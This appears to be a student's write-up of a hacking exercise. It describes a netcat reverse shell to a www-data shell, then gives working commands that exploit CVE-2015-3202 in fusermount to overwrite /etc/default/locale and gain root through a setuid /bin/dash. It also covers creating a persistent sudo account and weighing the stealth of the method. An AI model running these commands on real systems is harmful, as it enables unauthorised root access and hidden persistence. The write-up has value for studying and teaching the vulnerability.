1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
|
a
There is not much to explain here.. we open a listening netcat in the first terminal and the command second terminal opens a connection to it from the server we should attack, and executes /bin/bash.
We then have a shell for www-data in the first terminal.
c
I used https://www.exploit-db.com/exploits/37089/ which exploits CVE-2015-3202. It exploits a bug in fusermount which allows us to overwrite some file with root rights. We then overwrite /etc/bash.bashrc or /etc/default/locale or so to point to a script in /tmp, in which we do something that we want to be done with root rights. I used chmod 4755 /bin/dash, as suggested there. Then next time root logs in (in the case of /etc/bash.bashrc) or some cron job running with root rights sources /etc/default/locale, the exploit is executed. You can them come back and find /bin/dash with u+s rights, so you can get root rights in that shell.
I then created my own account (camil) with sudo rights so that I could clean up without losing root rights in case I would need it later. In particular, I removed the suid bit from /bin/dash so that others wouldn't find it and use it (e.g. find / -perm -u=s -type f 2>/dev/null)
Concretely, the commands used were:
$ printf "chmod 4755 /bin/dash" > /tmp/exploit
$ chmod 755 /tmp/exploit
$ mkdir -p '/tmp/exploit||/tmp/exploit'
$ LIBMOUNT_MTAB=/etc/default/locale _FUSE_COMMFD=0 fusermount '/tmp/exploit||/tmp/exploit'
fusermount: failed to open /etc/fuse.conf: Permission denied
sending file descriptor: Socket operation on non-socket
$ cat /etc/default/locale
/dev/fuse /tmp/exploit||/tmp/exploit fuse rw,nosuid,nodev,user=www-data 0 0
When locale is sourced, /dev/fuse /tmp/exploit will be piped to /tmp/exploit, so the latter is executed.
I had /etc/bash.bashrc changed as well since sometime on Saturday, but unfortunately root didn't login. I also found that using /etc/bash.bashrc isn't very stealthy, because if you're using bash as unprivileged user, you see:
bash: /dev/fuse: Permission denied
chmod: changing permissions of `/bin/dash': Operation not permitted
|
